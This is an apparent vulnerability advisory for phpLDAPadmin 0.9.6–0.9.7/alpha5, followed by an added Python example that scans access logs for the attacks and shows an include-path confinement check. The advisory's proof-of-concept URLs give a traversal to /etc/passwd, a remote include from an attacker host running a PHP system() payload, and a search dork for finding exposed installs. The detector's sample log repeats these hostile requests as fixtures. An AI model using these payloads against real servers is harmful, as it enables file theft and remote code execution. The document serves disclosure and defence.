phpLDAPadmin versions 0.9.6 through 0.9.7/alpha5 suffer from directory traversal, remote code execution and cross site scripting vulnerabilities. Detailed exploitation provided.
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting
software: phpLDAPadmin
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server
if unpatched and vulnerable, a user can read any file the web server process can
read, because the custom_welcome_page parameter is used as an include() path
without validation. poc:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
when allow_url_fopen is on, a user can also execute arbitrary php code and system
commands by pointing the same parameter at a remote file:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif
where cmd.gif is a file like this (the extension does not matter, include() runs
whatever php tags the fetched file contains):
<?php system('[some_command]'); ?>
also a user can craft a malicious url that injects client side code (html/javascript)
into the page, which will be executed in the security context of the victim browser
googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php
rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it
</span></span>
</code></pre>
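The advisory above describes two abuses of one unvalidated include path (a `../` traversal and a remote `http://` include). The following is an added example, written for this page and not code from the advisory or from the phpLDAPadmin project: it detects both patterns in web-server access logs and shows the confinement check the include is missing. It generalizes slightly beyond the advisory by treating any URL scheme, absolute paths, and double percent-encoding as hostile. The log lines, the `welcome.html` fixture, and the host names in them are constructed for the example.

```python
"""Added example; not code from the advisory or from phpLDAPadmin itself.

Two sides of the welcome.php?custom_welcome_page=... issue described above:
  * scan_log()/classify_param() spot traversal and remote-include attempts
    in web-server access logs, and
  * safe_welcome_page() shows the confinement check the include is missing.
The access-log lines and the welcome-page directory are constructed fixtures.
"""
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlsplit

# Request target out of a combined-format access-log line.
_REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Any URL scheme (http://, ftp://, php://, data:) hands include() something
# other than a local file under the web root. Assumption: treat every scheme
# as hostile, not only the http:// case the advisory shows. This also catches
# drive-letter prefixes such as c:, which are equally unwelcome.
_SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*:")

# Constructed access-log sample (IPs, timestamps and evil.example are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2005:10:01:12 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd HTTP/1.1" 200 1834',
    '10.0.0.5 - - [12/Feb/2005:10:01:40 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://evil.example/cmd.gif HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Feb/2005:10:02:03 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1834',
    '10.0.0.7 - - [12/Feb/2005:10:03:55 +0000] "GET /phpldapadmin/tree.php HTTP/1.1" 200 9001',
    '10.0.0.7 - - [12/Feb/2005:10:04:10 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=welcome.html HTTP/1.1" 200 300',
]


def classify_param(value: str) -> str:
    """Verdict for one custom_welcome_page value: 'remote_include', 'traversal' or 'benign'."""
    # parse_qs already decoded the value once; a second decode exposes
    # double-encoded payloads such as %252e%252e%252f.
    decoded = unquote(value)
    if _SCHEME_RE.match(decoded):
        return "remote_include"
    if decoded.startswith(("/", "\\")):
        return "traversal"  # an absolute path escapes the web root just as '..' does
    if any(seg == ".." for seg in re.split(r"[\\/]+", decoded)):
        return "traversal"
    return "benign"


def scan_log(lines):
    """Return (request_target, verdict) for every welcome.php hit carrying the parameter."""
    findings = []
    for line in lines:
        m = _REQ_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        url = urlsplit(target)
        if not url.path.endswith("/welcome.php"):
            continue
        for value in parse_qs(url.query).get("custom_welcome_page", []):
            findings.append((target, classify_param(value)))
    return findings


def safe_welcome_page(value: str, base_dir: str):
    """Confinement check the vulnerable include lacks: resolve the requested name
    under base_dir and refuse anything that does not land directly inside it.
    Returns the absolute path to serve, or None to reject the request."""
    if classify_param(value) != "benign":
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, unquote(value)))
    # realpath follows symlinks, so a link that points outside root is refused too.
    if os.path.dirname(candidate) != root:
        return None
    return candidate if os.path.isfile(candidate) else None


def make_demo_dir() -> str:
    """Constructed fixture: a directory holding one legitimate welcome page."""
    d = tempfile.mkdtemp(prefix="plademo_")
    with open(os.path.join(d, "welcome.html"), "w") as fh:
        fh.write("Welcome\n")
    return d


if __name__ == "__main__":
    for target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:15} {target}")
    demo = make_demo_dir()
    print(safe_welcome_page("welcome.html", demo))
    print(safe_welcome_page("../../etc/passwd", demo))
```

The detector keys on the parameter rather than on the literal `../` string, so percent-encoded and double-encoded variants are still caught; the mitigation side deliberately refuses subdirectories as well as escapes, since a welcome page has no reason to live anywhere but in its own directory.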